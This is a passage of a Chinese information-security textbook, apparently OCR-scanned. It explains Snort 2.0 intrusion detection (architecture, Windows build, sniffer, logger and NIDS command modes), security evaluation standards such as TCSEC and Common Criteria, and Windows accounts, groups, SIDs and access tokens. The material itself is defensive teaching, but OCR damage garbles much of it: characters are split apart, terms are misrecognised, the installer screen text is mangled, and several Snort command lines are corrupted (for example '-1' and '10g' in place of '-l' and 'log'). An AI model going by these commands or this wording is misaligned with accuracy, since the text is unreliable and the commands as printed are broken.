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。 Snort 2.0 能 够 进行 协议 分 析 , 内 容 的 搜索 匹配 .现在 Snort 能 够 分 析 的 协议 有 TCP、 
UDP 和 ICMP。 将 来 ， 可 能 提供 对 ARP、ICRP、GRE、OSPF、RIP、IPX 等 协议 


的 支持 。 
ee Snort 2.0 还 有 很 强 的 系统 防护 能 力 ， 使 用 FlexResp 功能 ，Snort 能 够 主动 断 开 恶 
意 连 接 。 


。 Snort 2.0 扩展 性 能 较 好 ， 对 于 新 的 攻击 威胁 反应 迅速 。 
。 Snort 2.0 的 规则 语言 非常 简单 ， 能 够 对 新 的 网 络 攻击 做 出 很 快 的 反应 。 因 为 其 规 
则 语言 简单 ， 所 以 很 容易 上 手 ， 从 而 节省 了 人 员 的 培训 费用 。 
因为 具有 以 上 种 种 优点 ， 所 以 Snort 在 网 络 入 侵 检测 系统 中 非常 流行 ， 目 前 国内 绝 大 
多 数 厂 家 沿用 的 是 Snort 核心 。 


2. Snort 2.0 的 体系 结构 与 工作 原理 


Snort 是 基于 特征 检测 的 IDS， 使 用 规则 来 检查 网 络 中 有 问题 的 数据 包 。 一 个 规则 被 触 
发 后 会 产生 一 条 报警 信息 。 

Snort 2.0 由 以 下 4 个 基本 模块 组 成 : 数据 包 嗅 探 器 、 预 处 理 器 、 检 测 引擎 和 报警 输出 
模块 。 图 6-11 是 Snort 2.0 的 体系 结构 图 ，Snort 的 工作 流程 可 以 用 硬币 分 拣 过 程 来 类 比 。 

(1) 取得 所 有 的 硬币 (从 网 卡 上 取得 所 有 数据 包 )。 

(2) 通过 传送 带 来 确定 这 些 是 否 是 硬币 ， 如 何 包 衷 ( 预 处 理 ) 这 些 硬币 。 

(3) 按照 硬币 的 面值 分 类 排列 ， 一 元 、 五 角 、 一 角 、 五 分 分 别 归 类 (IDS 的 检测 引擎 )。 

(4) 由 管理 员 决 定 如 何 处 理 这 些 硬币 ， 通 常 是 包 起 来 放 好 (记录 数据 包 并 保存 )。 


日 志文 件 /数据 库 


规则 设置 
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3. Snort 2.0 的 安装 

安装 Snort 所 必需 的 底层 库 有 三 个 。 

。 Libpcap 提供 的 接口 函数 。 主 要 实现 和 封装 了 与 数据 包 截获 有 关 的 过 程 。 

Libnet 提供 的 接口 函数 。 主 要 实现 和 封装 了 数据 包 的 构造 和 发 送 过 程 。 

NDIS packet capture Driver。 这 是 为 了 方便 用 户 在 Windows 环境 下 抓 取 和 处 理 网 络 
数据 包 而 提供 的 驱动 程序 。 

Snort 在 Win 32 环境 下 的 安装 步骤 如 下 所 示 。 

e 解 开 snort-1.8-win32-source.zip。 

e 用 VC++ 打 开 位 于 snort-1.8-win32-source\snort-1.7 \win32-Prj 目录 下 的 snort.dsw 
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文件 。 
e@ 选择 “Win 32 Release” 编 译 选项 进行 编译 。 
。 ”在 Release 目录 下 会 生成 所 需 的 Snort.exe 可 执行 文件 。 如 图 6-12 所 示 。 


Welcome to the Snort Windows 
Installer Installation Wizard 


ltis stiongly recommended that you exit all Windows programs 
before running this setup program 


Grek Ganeel to oatthe scp progam. then close any programs 
Tunning. Click Next to continue the installation. 


WARNING: This program is protected by copyright law and 
intemational teaties. 


Unauthorized reproduction or distribution of this program, or any 
Portion of , may resul in severe civil and criminal penalties, and 
‘wil be prosecuted to the maximum extent possible under law. 


一 cn | 


6-12 Snort 2.0 的 安装 


4. Snort 2.0 的 功能 及 命令 

Snort 2.0 有 3 个 主要 用 途 : 数据 包 嗅 探 、 数 据 包 记录 、 网 络 入 侵 检测 。 相 对 于 3 种 主 
要 用 途 ，Snort 2.0 有 三 种 工作 模式 : 嗅 探 器 、 数 据 包 记录 器 、 网 络 入 侵 检测 系统 。 嗅 探 器 
模式 仅仅 是 从 网 络 上 读 取 数据 包 并 作为 连续 不 断 的 流 显示 在 终端 上 。 数 据 包 记录 器 模式 把 
数据 包 记录 到 硬盘 上 。 网 络 入 侵 检测 模式 是 最 复杂 的 ， 也 是 可 配置 的 。 我 们 可 以 让 Snort 
分 析 网 络 数据 流 以 匹配 用 户 定义 的 一 些 规则 ， 并 根据 检测 结果 采取 一 定 的 动作 。 

检测 引擎 的 工作 流程 如 图 6-13 所 示 。 

1) “利用 Snort 2.0 作为 数据 包 嗅 探 器 

嗅 探 器 模式 就 是 Snort 从 网 络 上 读 出 数据 包 然后 将 其 显示 在 控制 台 上 。 首 先 从 最 基本 
的 用 法 入 手 。 如 果 只 要 把 TCP/IP 包头 信息 打印 在 屏幕 上 ， 只 需要 输入 下 面 的 命令 。 


./snort-v 

使 用 这 个 命令 将 使 Snort 只 输出 也 和 TCP/UDP/ICMP 的 包头 信息 。 如 果 要 看 到 应 用 层 
的 数据 ， 可 以 使 用 下 面 的 命令 。 

./snort-vd 

这 条 命令 使 Snort 在 输出 包头 信息 的 同时 显示 包 的 数据 信息 。 如 果 还 要 显示 数据 链 路 
层 的 信息 ， 就 使 用 下 面 的 命令 。 


./snort-vde 


图 6-13 Snort 2.0 的 检测 引擎 模块 


注意 这 些 选项 开关 还 可 以 分 开 写 或 者 任意 结合 在 一 块 。 例 如 ， 下 面 的 命令 就 和 上 面 最 
后 的 一 条 命令 等 价 : 


./snort-d-v-e 


2) ”利用 Snort 2.0 作为 数据 包 记 录 器 

所 有 的 包 记录 到 硬盘 上 ， 需 要 指定 一 个 日 志 目录 ，Snort 就 会 自动 记录 数据 包 ， 所 使 用 
的 命令 是 : 

./snort-dev-1./log 

当然 ，./log 目录 必须 存在 ， 否则 Snort 就 会 报告 错误 信息 并 退出 。 当 Snort 在 这 种 模式 
下 运行 ， 它 会 记录 所 有 看 到 的 包 并 将 其 放 到 一 个 目录 中 ， 这 个 目录 以 数据 包 目 的 主机 的 卫 
地 址 命名 ， 例 如 ，192.168.10.1。 

如 果 只 指定 了 -!1 命令 开关 ， 而 没有 设置 目录 名 ，Snort 有 时 会 使 用 远程 主机 的 卫 地 址 
作为 目录 ， 有 时 会 使 用 本 地 主机 IP 地 址 作为 目录 名 。 为 了 只 对 本 地 网 络 进行 日 志 ， 需 要 给 
出 本 地 网 络 ， 命 令 如 下 : 


./snort-dev-1./10g-h192.168.1.0/24 


这 个 命令 告诉 Snort 把 进入 C 类 网 络 192.168.1 的 所 有 包 的 数据 链 路 ,TCP/IP 以 及 应 用 
层 的 数据 记录 到 目录 ./log 中 。 

如 果 网 络 速度 很 快 ， 或 者 想 使 日 志 更 加 紧凑 以 便 以 后 的 分 析 ， 那 么 应 该 使 用 二 进 制 的 
日 志文 件 格式 。 所 谓 的 二 进 制 日 志文 件 格式 就 是 toPdump 程序 使 用 的 格式 。 使 用 下 面 的 命 
令 可 以 把 所 有 的 包 记 录 到 一 个 单一 的 二 进 制 文件 中 : 


./snort-1./1og-b 
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注意 此 处 的 命令 行 和 上 面 的 有 很 大 的 不 同 。 我 们 无 须 指定 本 地 网 络 ， 因 为 所 有 的 东西 
都 被 记录 到 一 个 单一 的 文件 。 你 也 不 必 使 用 元 余 模 式 或 者 -4d、-e 功能 选项 ， 因 为 数据 包 中 
的 所 有 内 容 都 会 被 记录 到 日 志文 件 中 。 

3) ”Snort 2.0 作为 网 络 入 侵 检测 系统 

Snort 最 重要 的 用 途 是 作为 网 络 入 侵 检 测 系统 (NIDS), 使 用 下 面 的 命令 行 可 以 启动 这 种 
模式 : 

./snort-dev-1./10g-h192.168.1.0/24-c snort .conf 

snort.conf 是 规则 集 文件 。Snort 会 对 每 个 包 和 规则 集 进行 匹配 ， 发 现 与 规则 集 匹 配 的 
包 就 采取 相应 的 行动 。 如 果 不 指 定 输出 目录 ，Snort 就 输出 到 /var/fo。 


注意 : 如 果 想 长 期 使 用 Snort 作为 自己 的 入 侵 检测 系统 ， 最 好 不 要 使 用 -V 选项 。 因 为 使 用 


这 个 选项 ，Snort 会 在 屏幕 上 输出 一 些 信息 ， 大 大 降低 Snort 的 处 理 速度 ， 从 而 导致 
在 向 显示 器 输出 的 过 程 中 丢 齐 了 一 些 包 。 


此 外 ， 在 绝 大 多 数 情况 下 ， 也 没有 必要 记录 数据 链 路 层 的 包头 ， 所 以 -e 选项 也 可 以 
不 用 。 
./snort-d-h192.168.1.0/24-1./log-c snort.conf 


这 是 使 用 Snort 作为 网 络 入 侵 检测 系统 最 基本 的 形式 ， 日 志 符合 规则 的 包 以 ASCII 形 
式 保 存在 有 层次 的 目录 结构 中 。 
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本 章 要 点 

操作 系统 安全 的 概念 及 安全 评估 

Windows 安全 子 系统 的 构成 、 身 份 验 证 及 访问 控制 的 实现 
Windows 文件 系统 安全 实现 及 注册 表 的 访问 控制 

Linux 帐号 管理 机 制 及 文件 权限 设置 

Windows 及 Linux 系统 日 志 的 查看 


7.1 操作 系统 安全 概述 


7.1.1 操作 系统 安全 的 概念 


操作 系统 是 一 组 面向 计算 机 和 用 户 的 程序 ， 是 应 用 软件 同系 统 硬件 的 接口 ， 其 目标 是 
高 效 地 、 最 大 限度 地 、 合 理 地 使 用 计算 机 资源 。 安 全 就 是 最 大 限度 地 减少 数据 和 资源 被 攻 
击 的 可 能 性 。 操 作 系统 安全 包括 了 对 系统 重要 资源 的 保护 和 控制 ， 即 只 有 经 过 授权 的 用 户 
和 代表 该 用 户 运行 的 进程 才能 对 计算 机 系统 的 资源 进行 访问 。 所 谓 一 个 计算 机 系统 是 安全 
的 ， 是 指 该 系统 能 够 通过 特定 的 安全 功能 或 安全 服务 控制 外 部 对 系统 资源 的 访问 。 

操作 系统 内 的 一 切 活动 均 可 看 作 是 主体 对 计算 机 内 部 各 客体 的 访问 活动 。 操 作 系统 中 
的 所 有 资源 均 可 视 为 客体 ， 对 客体 的 进行 访问 或 使 用 的 实体 称 为 主体 ， 如 操作 系统 中 的 用 
户 和 用 户 执 行 的 进程 均 是 主体 。 操 作 系统 的 安全 依赖 于 一 些 具体 实施 安全 策略 的 可 信 的 软 
件 和 硬件 ， 这 些 软件 、 硬 件 和 负责 系统 安全 管理 的 人 员 一 起 组 成 了 系统 的 可 信任 计算 基 
(Trusted Computing Base，TCB)。TCB 是 系统 安全 的 基础 ， 通 过 安全 策略 来 控制 主体 对 客 
体 的 存 取 ， 达 到 保护 客体 安全 的 目的 。 

安全 策略 是 指 有 关 管 理 、 保 护 和 发 布 敏感 信息 的 法 律 、 规 定 和 实施 细则 ， 用 来 描述 人 

们 如 何 存 取 文 件 或 其 他 信息 。 对 于 给 定 的 计算 机 主体 和 客体 ， 必 须 有 一 套 严格 而 科学 的 规 
则 来 确定 一 个 主体 是 否 被 授权 获得 对 客体 的 访问 。 例 如 ， 可 以 将 安全 策略 定义 为 ， 系 统 中 
的 用 户 和 信息 被 划分 为 不 同 的 层次 ， 一 些 级 别 比 男 一 些 级 别 高 ， 当 且 仅 当主 体 的 级 别 低 于 
或 等 于 客体 的 级 别 ， 主 体 才能 读 访问 客体 ， 当 且 仅 当主 体 的 级 别 高 于 或 等 于 客体 的 级 别 ， 
主体 才能 写 访问 客体 。 
在 对 安全 策略 进行 研究 时 ， 人 们 将 安全 策略 抽象 成 安全 模型 ， 以 便于 用 形式 化 的 方法 
来 证 明 该 策略 是 安全 的 。 安 全 模型 是 对 安全 策略 所 表达 的 安全 需求 的 简单 、 抽 象 和 无 歧义 
的 描述 ， 它 为 安全 策略 和 安全 策略 实现 机 制 的 关联 提供 了 一 种 框架 。 安 全 模型 描述 了 对 某 
个 安全 策略 需要 用 哪 种 机 制 来 满足 ， 而 安全 模型 的 实现 则 描述 了 如 何 把 特定 的 机 制 应 用 于 
系统 中 , 从 而 实现 某 一 特定 安全 策略 所 需 的 安全 保护 。 主要 安全 模型 有 Bell-LaPadula 模型 、 
Biba 模型 、Clark-Wilson 模型 、 中 国 墙 模 型 等 。 
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在 进行 操作 系统 设计 时 ， 操 作 系 统 的 安全 部 分 是 按照 安全 模型 进行 设计 的 ， 但 由 于 设 
计时 对 安全 性 考虑 不 充分 或 在 实现 过 程 中 由 于 各 种 原因 ， 而 产生 了 一 些 出 乎 设计 者 意图 之 
外 的 性 质 ， 这 些 被 称 为 操作 系统 的 缺陷 。 特 别 是 近年 来 ， 随 着 各 种 系统 入 侵 和 攻击 技术 的 
不 断 发 展 ， 操 作 系 统 的 各 种 缺陷 不 断 被 发 现 ， 其 中 最 为 典型 的 是 缓冲 区 溢出 缺陷 ， 几 乎 所 
有 的 操作 系统 都 不 同 程度 地 存在 这 种 缺陷 。 因 此 ， 在 理解 操作 系统 安全 这 个 概念 时 ， 通 常 
具有 三 层 含义 : 一 是 指使 用 具有 有 效 的 安全 体系 结构 的 操作 系统 ; 二 是 指 充分 利用 操作 系 
统 在 设计 时 提供 的 权限 访问 控制 、 信 息 加 密 保护 、 完 整 性 鉴定 等 安全 机 制 所 实现 的 安全 ; 
三 是 指 在 操作 系统 使 用 过 程 中 ， 通 过 系统 配置 ， 以 确保 操作 系统 尽量 避免 由 于 实现 时 的 缺 
陷 和 具体 应 用 环境 因素 而 产生 的 不 安全 因素 。 只 有 通过 这 三 个 方面 的 同时 努力 ， 才 能 最 大 
可 能 地 保证 操作 系统 的 安全 。 


7.1.2 操作 系统 安全 的 评估 


计算 机 系统 安全 评价 标准 是 一 种 技术 性 法 规 。 在 信息 安全 这 一 特殊 领域 ， 如 果 没有 这 
-标准 ， 与 此 相关 的 立法 、 执 法 就 会 有 失 偏颇 ， 最 终 会 给 国家 的 信息 安全 带 来 严重 后 果 。 
由 于 信息 安全 产品 和 系统 的 安全 评价 事 关 国 家 的 安全 利益 ， 因 此 许多 国家 都 在 充分 借鉴 国 
际 标 准 的 前 提 下 ， 积 极 制订 本 国 的 计算 机 安全 评价 认证 标准 。 下 面 分 别 介绍 国外 和 国内 主 
要 的 计算 机 系统 安全 评估 准则 。 

1. 国外 安全 评估 标准 


(1) 可 信 计 算 机 系统 安全 评估 标准 (Trusted Computer System Evaluation Criteria， 
TCSEC) 又 称 为 橘 皮 书 ， 是 计算 机 系统 安全 评估 的 第 一 个 正式 标准 ， 具 有 划时代 的 意义 。 该 
标准 是 美国 国防 部 于 1985 年 制定 的 ， 最 初 只 是 军用 标准 ， 后 来 延伸 至 民用 领域 ， 为 计算 机 
安全 产品 的 评测 提供 了 测试 方法 ， 指 导 信 息 安全 产品 的 制造 和 应 用 。 它 将 计算 机 系统 的 安 
全 划分 为 4 个 等 级 、8 个 级 别 。 

D 类 安全 等 级 : D 类 安全 等 级 只 包括 D1 一 个 级 别 。 D1 的 安全 等 级 最 低 。D1 系统 只 为 
文件 和 用 户 提供 安全 保护 。D1 系统 最 普通 的 形式 是 本 地 操作 系统 , 或 者 是 一 个 完全 没有 保 
护 的 网 络 。 

C 类 安全 等 级 : 该 类 安全 等 级 能 够 提供 审慎 的 保护 ， 并 为 用 户 的 行动 和 责任 提供 审计 
能 力 。C 类 安全 等 级 可 划分 为 Cl1 和 C2 两 类 。C1 系统 的 可 信任 运算 基 (Trusted Computing 
Base，TCB) 通 过 将 用 户 和 数据 分 开 来 达到 安全 的 目的 。 在 Cl 系统 中 ， 所 有 的 用 户 以 同样 
的 灵敏 度 来 处 理 数据 ， 即 用 户 认为 Cl 系统 中 的 所 有 文档 都 具有 相同 的 机 密 性 。C2 系统 比 
C1 系统 加 强 了 可 调 的 审慎 控制 。 在 连接 到 网 络 上 时 ，C2 系统 的 用 户 分 别 对 各 自 的 行为 负 
责 。C2 系统 通过 登录 过 程 、 安 全 事件 和 资源 隔离 来 增强 这 种 控制 。C2 系统 具有 C1 系统 中 
所 有 的 安全 性 特征 。 

B 类 安全 等 级 : B 类 安全 等 级 可 分 为 B1、B2 和 B3 三 类 。B 类 系统 具有 强制 性 保护 功 
能 。 强 制 性 保护 意味 着 如 果 用 户 没有 与 安全 等 级 相连 ， 系 统 就 不 会 让 用 户 存 取 对 象 。B1 系 
统 满足 下 列 要 求 : 系统 对 网 络 控制 下 的 每 个 对 象 都 进行 灵敏 度 标记 ， 系统 使 用 灵敏 度 标记 
作为 所 有 强迫 访问 控制 的 基础 ， 系 统 在 把 导入 的 、 非 标记 的 对 象 放 入 系统 前 标记 它们 ; 灵 
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敏 度 标记 必须 准确 地 表示 其 所 联系 的 对 象 的 安全 级 别 ， 当 系统 管理 员 创 建 系统 或 者 增加 新 
的 通信 通道 或 IO 设备 时 ， 管 理 员 必须 指定 每 个 通信 通道 和 IO 设备 是 单 级 还 是 多 级 ， 并 
且 管 理 员 只 能 手工 改变 指定 ; 单 级 设备 并 不 保持 传输 信息 的 灵敏 度 级 别 ， 所 有 直接 面向 用 
户 位 置 的 输出 (无 论 是 虚拟 的 还 是 物理 的 ) 都 必须 产生 标记 来 指示 关于 输出 对 象 的 灵敏 度 ; 
系统 必须 使 用 用 户 的 口令 或 证 明 来 决定 用 户 的 安全 访问 级 别 ; 系统 必须 通过 审计 来 记录 未 
授权 访问 的 企图 。B2 系统 必须 满足 Bl 系统 的 所 有 要 求 。 另 外 ，B2 系统 的 管理 员 必 须 使 用 
-个 明确 的 、 文 档 化 的 安全 策略 模式 作为 系统 的 可 信任 运算 基础 体制 。B2 系统 必须 满足 下 
列 要 求 : 系统 必须 能 够 立即 通知 系统 中 的 每 一 个 用 户 所 有 与 之 相关 的 网 络 连接 的 改变 ;只 
有 用 户 能 够 在 可 信任 通信 路 径 中 进行 初始 化 通信 ; 可 信任 运算 基础 体制 能 够 支持 独立 的 操 
作者 和 管理 员 。B3 系统 必须 符合 B2 系统 的 所 有 安全 需求 。B3 系统 具有 很 强 的 监视 委托 管 
理 访问 能 力 和 抗 干扰 能 力 。B3 系统 必须 设 有 安全 管理 员 。B3 系统 应 满足 以 下 要 求 : 除了 
控制 个 别 对 象 的 访问 外 ，B3 必须 产生 一 个 可 读 的 安全 列表 ; 每 个 被 命名 的 对 象 提供 对 该 对 
象 没有 访问 权 的 用 户 列表 说 明 ; B3 系统 在 进行 任何 操作 前 ， 要 求 用 户 进行 身份 验证 ，B3 
系统 验证 每 个 用 户 ， 同 时 还 会 发 送 一 个 取消 访问 的 审计 跟踪 消息 ， 设计 者 必须 正确 区 分 可 
信任 的 通信 路 径 和 其 他 路 径 ， 可 信任 的 通信 基础 体制 为 每 一 个 被 命名 的 对 象 建立 安全 审计 
跟踪 ; 可 信任 的 运算 基础 体制 支持 独立 的 安全 管理 。 

A 类 安全 等 级 : A 系统 的 安全 级 别 最 高 。 目前, A 类 安全 等 级 只 包含 Al 一 个 安全 类 别 。 
Al 类 与 B3 类 相似 , 对 系统 的 结构 和 策略 不 作 特别 要 求 。 Al 系统 的 显著 特征 是 ,系统 的 设 
计 者 必须 按照 一 个 正式 的 设计 规范 来 分 析 系 统 。 对 系统 分 析 后 ， 设 计 者 必须 运用 核对 技术 
来 确保 系统 符合 设计 规范 。Al 系统 必须 满足 下 列 要 求 : 系统 管理 员 必 须 从 开发 者 那里 接收 
到 一 个 安全 策略 的 正式 模型 ， 所 有 的 安装 操作 都 必须 由 系统 管理 员 进行 ， 系 统管 理 员 进 行 
的 每 一 步 安 装 操作 都 必须 有 正式 文档 。 

目前 ， 较 流行 的 儿 种 操作 系统 的 安全 性 比较 如 表 7-1 所 示 。 


表 7-1 常见 操作 系统 安全 级 别 


操作 系统 安全 级 别 
美国 Trusted Information Systems 公司 的 TMch 操 
作 系 统 
UNIX Ware 2.1/ES B2 
OSF/1 Bl 
Windows NT/2000/2003/Vista C2 
Solaris C2 
Red Hat Linux Fedora 2/3 C2 
DOS、Windows 95/98 D 


(2) 欧洲 的 安全 评价 标准 (Information Technology Security Evaluation Criteria, ITSEC) 
是 欧洲 多 国安 全 评价 方法 的 综合 产物 ， 应 用 领域 为 军队 、 政 府 和 商业 。 该 标准 将 安全 概念 
分 为 功能 与 评估 两 部 分 。 功 能 准则 从 F1 一 F10 共 分 10 级 。 F1~F5 级 对 应 于 TCSEC 的 D 一 
A。F6~F10 级 分 别 对 应 数据 和 程序 的 完整 性 、 系 统 的 可 用 性 、 数 据 通 信 的 完整 性 、 数 据 通 
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信 的 保密 性 以 及 机 密 性 和 完整 性 的 网 络 安全 。 评 估 准 则 分 为 6 级 ， 分 别 是 测试 、 配 置 控制 
和 可 控 的 分 配 、 能 访问 详细 设计 和 源码 、 详 细 的 脆弱 性 分 析 、 设 计 与 源码 明显 对 应 以 及 设 
计 与 源码 在 形式 上 一 致 。 

(3) 加 拿 大 的 评价 标准 (Canadian Trusted Computer Product Evaluation Criteria , 
CTCPEC) 专 门 针 对 政府 需求 而 设计 。 与 ITSEC 类 似 ， 该 标准 将 安全 分 为 功能 性 需求 和 保证 
性 需要 两 部 分 。 功 能 性 需求 共 划分 为 4 大 类 : 机 密 性 、 完 整 性 、 可 用 性 和 可 控 性 。 每 种 安 
全 需求 又 可 以 分 成 很 多 小 类 ， 来 表示 安全 性 上 的 差别 ， 分 级 条 数 为 0 一 5 级 。 

(4) 美国 联邦 准则 (Federal Criteria, FC) 是 对 TCSEC 的 升级 , 并 引入 了 “保护 轮廓 ”CPP) 
的 概念 。 每 个 轮廓 都 包括 功能 、 开 发 保证 和 评价 三 部 分 。FC 充分 吸取 了 ITSEC 和 CTCPEC 
的 优点 ， 在 美国 的 政府 、 民 间 和 商业 领域 得 到 广泛 应 用 。 

(5) 国际 通用 准则 (Common Criteria, CC) 是 国际 标准 化 组 织 统一 现 有 多 种 准则 的 结果 ， 
是 目前 最 全 面 的 评价 准则 。1996 年 6 月 ，CC 第 一 版 发 布 ，1998 年 5 月 ，CC 第 二 版 发 布 ; 
1999 年 10 月 CC v2.1 版 发 布 , 并 且 成 为 ISO 标准 。CC 的 主要 思想 和 框架 都 取 自 ITSEC 和 
FC， 并 充分 突出 了 “保护 轮廓 ”概念 。CC 将 评估 过 程 划 分 为 功能 和 保证 两 部 分 ， 评 估 等 
级 分 为 EAL1、EAL2、EAL3、EAL4、EAL5、EAL6 和 EAL7 共 7 个 等 级 。 每 一 级 均 需 评 
估 7 个 功能 类 ， 分 别 是 配置 管理 、 分 发 和 操作 、 开 发 过 程 、 指 导 文 献 、 生 命 期 的 技术 支持 、 
测试 和 脆弱 性 评估 。 

2. 国内 安全 评估 标准 

国内 安全 评估 主要 是 采用 国际 标准 。 同 时 ， 为 了 适应 我 国信 息 安 全 发 展 的 需求 ， 公 安 
部 主持 制定 、 国 家 技术 标准 局 发 布 的 中 华人 民 共 和 国 国家 标准 GB 17895 一 1999《 计 算 
机 信息 系统 安全 保护 等 级 划分 准则 》 已 经 正式 颁布 ， 已 于 2001 年 1 月 1 日 起 实施 。 该 准则 
将 信息 系统 安全 分 为 5 个 等 级 ， 分 别 是: 自主 保护 级 、 系 统 审计 保护 级 、 安 全 标记 保护 级 、 
结构 化 保护 级 和 访问 验证 保护 级 。 主 要 的 安全 考核 指标 有 身份 认证 、 自 主 访问 控制 、 数 据 
完整 性 、 审 计 、 隐 项 信道 分 析 、 客 体重 用 、 强 制 访问 控制 、 安 全 标记 、 可 信 路 径 和 可 信 恢 
复 等 ， 这 些 指标 涵盖 了 不 同 级 别 的 安全 要 求 。 

具体 的 安全 考核 指标 与 安全 级 别 的 对 应 关系 如 表 7-2 所 示 。 


表 7-2 操作 系统 的 5 个 级 别 
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安全 标记 v 
隐 项 信道 分 析 | 
可 信 路 径 


可 信 恢 复 


7.2 Windows 安全 技术 


从 1983 年 Microsoft 公司 宣布 Windows 的 诞生 到 2006 年 底 Windows Vista 的 推出 ， 
Windows 已 经 走 过 了 二 十 多 年 的 历史 ， 目 前 其 在 全 球 桌面 操作 系统 市 场 上 的 占有 率 已 达 
90% 以 上 ， 在 服务 器 操作 系统 市 场 上 的 占有 率 也 达 20% 以 上 。 而 Windows 系列 操作 系统 在 
受到 用 户 广泛 欢迎 的 同时 ， 其 安全 防护 问题 也 日 益 突出 。 

本 节 主 要 介绍 基于 NT 内 核 的 Windows 操作 系统 中 常用 的 安全 技术 及 安全 实现 ， 包 括 
身份 验证 与 访问 控制 、 文 件 系 统 安全 、 注 册 表 安全 以 及 审核 与 日 志 等 四 个 方面 。 


7.2.1 身份 验证 与 访问 控制 

1. 基本 概念 

Windows 系统 内 置 支持 用 户 身份 验证 (Authentication) 和 访问 控制 (Access ControD) 等 安 
全 机 制 ， 其 中 身份 验证 是 访问 控制 的 基础 。 下 面 介绍 与 身份 验证 和 访问 控制 相关 的 基本 概念 。 

1) ”用 户 帐 户 (Account) 

用 户 帐 户 是 一 种 参考 上 下 文 的 描述 符 ， 操 作 系统 在 这 个 上 下 文 描述 符 中 运行 它 的 大 部 
分 代码 。 如 果 用 户 使 用 帐户 凭据 (用 户 名 和 口令 ) 成 功 通过 了 登录 验证 ， 之 后 它 执行 的 所 有 
命令 都 具有 该 用 户 的 权限 。 于 是 ， 执 行 代码 所 进行 的 操作 只 受 限于 运行 它 的 帐户 所 具有 的 
权限 。 

用 户 帐 户 分 为 本 地 用 户 帐户 和 域 用 户 帐户 ， 本 地 用 户 帐户 访问 本 地 计算 机 ， 只 在 本 地 
进行 身份 验证 ， 存 在 于 本 地 帐户 数据 库 SAM(Security Account Manager) 中 ; 域 用 户 帐 户 用 
于 访问 网 络 资源 ， 存 在 于 活动 目录 (Active Directory) 中 。 

Windows 系统 常见 的 帐户 如 表 7-3 所 示 。 

表 7-3 Windows 系统 常见 帐户 


帐户 名 说 明 
System 或 Local System 拥有 本 地 计算 机 的 完全 控制 权 
Administrator 拥有 本 地 计算 机 的 完全 控制 权 ， 但 低 于 System 
i 用 于 偶尔 或 一 次 性 访问 的 用 户 ， 而 且 它 的 权限 是 相对 受 
限 的， 默认 禁止 
IUSER 计算 机 名 IIS 的 匿名 访问 ， 是 Guests 组 成 员 
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续 表 
帐户 名 
IWAM 计算 机 名 
TSInternetUser 


说 明 
IIS 的 进程 外 应 用 程序 作为 这 个 帐户 运行 ,Guests 组 成 员 
用 于 终端 服务 
Kerberos 密 钥 分 发 中 心 帐户 ， 只 在 域 控制 器 上 出 现 ， 默 
认 是 禁止 的 
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2) 组 (Group) 

组 是 用 户 帐户 的 一 种 容器 ， 代 表 着 很 多 用 户 帐户 的 集合 。 组 提供 了 一 种 方式 ， 这 种 方 
式 可 以 将 用 户 帐户 组 织 成 若干 具有 类 似 安全 需求 的 用 户 组 ， 然 后 将 安全 权限 指派 给 组 ， 而 
不 用 指派 给 单独 的 用 户 。 一 个 用 户 帐 户 可 以 属于 一 个 组 、 多 个 组 或 是 不 属于 任何 组 。 

组 对 应 安全 性 管理 是 一 个 非常 有 价值 的 工具 。 要 确保 所 有 具有 访问 需求 的 用 户 帐户 拥 
有 相同 的 权限 ， 可 以 通过 使 用 组 来 简化 这 项 工作 。 

Windows 含有 一 些 内 置 的 组 ， 每 个 都 具有 预定 义 的 一 组 权力 、 权 限 及 限制 条 件 。 
Windows 系统 常用 的 组 如 表 7-4 所 示 。 


表 7-4 Windows 系统 常用 的 组 


组 名 说 了 明 

Administrators 功能 最 强大 的 组 ， 具 有 系统 的 完全 控制 权 

Power Users 含有 很 多 权限 ， 但 不 是 Administrators 组 所 具有 的 所 有 权限 

Users 用 于 不 需要 管理 系统 的 用 户 ， 权 限 有 限 

Guests 为 偶尔 访问 的 用 户 和 来 宾 提 供 有 限 的 访问 权 

二 次 估 各 从 及 全 利 关 秆 习 。 文件 所 需 的 权限 ， 这 些 文件 中 也 含有 
组 中 成 员 不 具有 访问 权限 的 文件 

Replicator 组 成 员 可 以 管理 文件 的 域 间 复制 

Network Configuration Operators 组 成 员 可 以 安装 及 配置 网 络 组 件 

Remote Desktop Users 提供 通过 远程 桌面 连接 对 计算 机 的 访问 

HelpServices Group 允许 技术 支持 人 员 连 接 到 你 的 计算 机 

Print Operators 在 域 控制 器 上 安装 和 印 载 设备 驱动 程序 

Everyone 当前 网 络 所 有 用 户 ， 包 括 Guests 和 来 自 其 他 域 的 用 户 


3) ”强制 登录 (Mandatory Logon) 

Windows 2000/XP/2003 是 强制 登录 的 操作 系统 ,要 求 所 有 的 用 户 使 用 系统 前 必须 登录 ， 
通过 验证 后 才 可 以 访问 资源 。 

4) “安全 标识 符 (Security Identifiers) 

安全 标识 符 又 称 SID， 是 标识 用 户 、 组 和 计算 机 帐户 的 唯一 的 号 码 。 在 第 一 次 创建 帐 
户 时 ， 将 给 网 络 上 的 每 一 个 帐户 发 布 一 个 唯一 的 SD。Windows 系统 的 内 部 进程 将 引用 帐 
户 的 SID 而 不 是 帐户 的 用 户 名 或 组 名 。 如 果 创 建 一 个 帐户 后 删除 ， 然 后 使 用 相同 的 用 户 名 
创建 另 一 个 帐户 ， 则 新 帐户 将 不 具有 授权 给 前 一 个 帐户 的 权力 或 权限 ， 原 因 是 该 帐户 具有 


TTT EPE 


不 同 的 SID 号 。 系 统 中 SID 以 48 位 数字 存储 ， 各 位 的 含义 如 图 7-1 所 示 。 
编号 颁发 机 构 RID 


vv + 


S-1-S-21-310440S88-2S0036847-S80389S0S-S 
~ 


标识 符 子 颁发 机 构 


图 7-1 SID 示 例 

图 中 第 一 项 S 表示 该 字符 串 是 SID。 第 二 项 是 SID 的 版 本 号 ,对 于 Windows 2000 来 说 ， 
这 个 就 是 1。 然后 是 标识 符 的 颁发 机 构 (identifier authority)， 对 于 Windows 2000 的 帐户 ， 颁 
发 机 构 就 是 NT， 值 是 5。 再 然后 是 一 系列 的 子 颁发 机 构 ， 前 面 几 项 是 标志 域 的 ， 最 后 一 个 
标志 着 域内 的 帐户 和 组 。 最 后 一 项 是 相对 标识 符 (Relative ID，RID)， 用 来 解决 SID 的 重复 
问题 。 

5) ”访问 令 牌 (Access Tokens) 

用 户 通过 验证 后 ， 登 录 进程 会 给 用 户 一 个 访问 令 牌 ， 该 令 牌 相当 于 用 户 访问 系统 资源 
的 票证 ， 当 用 户 试 图 访问 系统 资源 时 ， 将 访问 令 牌 提供 给 Windows 系统 ， 然 后 Windows 
